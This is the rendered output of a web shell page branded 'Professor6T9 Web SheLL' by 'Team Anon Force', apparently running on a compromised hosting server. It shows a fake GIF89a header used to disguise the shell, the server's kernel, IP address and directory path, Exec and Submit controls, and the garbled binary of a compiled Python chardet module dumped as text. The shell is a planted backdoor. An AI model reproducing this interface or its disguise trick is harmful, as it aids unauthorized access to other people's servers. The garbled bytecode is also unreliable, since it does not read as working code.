GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
opt
/
cloudlinux
/
venv
/
lib64
/
python3.11
/
site-packages
/
chardet
/
cli
/
__pycache__
[ HOME ]
Exec
Submit
File Name : chardetect.cpython-311.pyc
� � h� � �� � d Z ddlZddlZddlmZmZmZ ddlmZ ddl m Z dd ee d ede de d ee f d�Zddeee d dfd�Zedk r e� � dS dS )a Script which takes one or more file paths and reports on their detected encodings Example:: % chardetect somefile someotherfile somefile: windows-1252 with confidence 0.5 someotherfile: ascii with confidence 1.0 If no paths are provided, it takes its input from stdin. � N)�Iterable�List�Optional� )�__version__)�UniversalDetector�stdinF�lines�name�minimal�should_rename_legacy�returnc � � t |�� � }| D ]/}t |� � }|� |� � |j r n�0|� � � |j }|r|d S |d r|� d|d � d|d � �S |� d�S )a� Return a string describing the probable encoding of a file or list of strings. :param lines: The lines to get the encoding of. :type lines: Iterable of bytes :param name: Name of file or collection of lines :type name: str :param should_rename_legacy: Should we rename legacy encodings to their more modern equivalents? :type should_rename_legacy: ``bool`` )r �encodingz: z with confidence � confidencez: no result)r � bytearray�feed�done�close�result)r r r r �u�liner s �g/builddir/build/BUILD/cloudlinux-venv-1.0.8/venv/lib/python3.11/site-packages/chardet/cli/chardetect.py�description_ofr s� � �$ �/C�D�D�D�A�� � ������� ���t�����6� ��E� ��G�G�I�I�I� �X�F�� "��j�!�!� �j�� V��U�U�&��,�U�U�v�l�?S�U�U�U������ �argvc �D � t j d�� � }|� ddt j d� � dt j j g�� � |� dd d �� � |� dd dd �� � |� dddt � ��� � |� | � � }|j D ]`}|� � � rt dt j �� � t t ||j |j |j �� � � � �adS )z� Handles command line arguments and gets things started. :param argv: List of arguments, as if specified on the command-line. If None, ``sys.argv[1:]`` is used instead. :type argv: list of str zATakes one or more file paths and reports their detected encodings)�description�inputz@File whose encoding we would like to determine. (default: stdin)�rb�*)�help�type�nargs�defaultz --minimalz*Print only the encoding to standard output� store_true)r"